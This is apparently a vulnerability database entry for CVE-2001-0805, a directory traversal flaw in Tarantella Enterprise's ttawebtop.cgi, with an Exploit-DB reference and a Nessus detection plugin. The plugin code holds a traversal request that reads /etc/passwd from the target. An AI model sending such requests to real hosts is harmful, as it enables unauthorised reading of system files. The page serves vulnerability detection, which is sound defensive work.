Vulnerabilities > CVE-2001-0805 - Unspecified vulnerability in Tarantella Enterprise 3.0/3.01

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
tarantella
nessus
exploit available
NVD
Published: 2001-12-06
Updated: 2024-02-14

Summary

Directory traversal vulnerability in ttawebtop.cgi in Tarantella Enterprise 3.00 and 3.01 allows remote attackers to read arbitrary files via a .. (dot dot) in the pg parameter.

Vulnerable Configurations

Part Description Count
Application
Tarantella
2

Exploit-Db

descriptionTarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability. CVE-2001-0805. Remote exploit for cgi platform
idEDB-ID:20940
last seen2016-02-02
modified2001-06-18
published2001-06-18
reporterkf
sourcehttps://www.exploit-db.com/download/20940/
titleTarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability

Nessus

NASL familyCGI abuses
NASL idTTAWEBTOP.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10696
published2001-06-20
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10696
titleTarantella Enterprise ttawebtop.cgi pg Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10696);
 script_version ("1.24");
 script_cve_id("CVE-2001-0805");
 script_bugtraq_id(2890);
 
 script_name(english:"Tarantella Enterprise ttawebtop.cgi pg Parameter Traversal Arbitrary File Access");

 script_set_attribute(attribute:"synopsis", value:
"The remote host has a CGI installed that is affected by
multiple vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The 'ttawebtop.cgi' CGI is installed. The installed version
is affected by multiple flaws :

  - It is possible to read arbitrary files from the remote 
    system by including directory traversal strings in the 
    request.

  - It may be possible for an attacker to execute arbitrary
    commands with the privileges of the http daemon (usually 
    root or nobody). Note though Nessus has not verified if 
    command execution is possible." );
 script_set_attribute(attribute:"solution", value:
"remove it from /cgi-bin." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/20");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/06/18");
 script_cvs_date("Date: 2018/08/01 17:36:12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english:"Checks for the presence of /cgi-bin/ttawebtop.cgi");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 res = http_send_recv3(method:"GET", item:string(dir, "/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd"), port:port);
 if( isnull(res)) exit(1,"Null response to ttawebtop.cgi request.");
 if(egrep(pattern:".*root:.*:0:[01]:.*", string:res[2]))
  {	
    security_hole(port);
    exit(0);
  }
}

References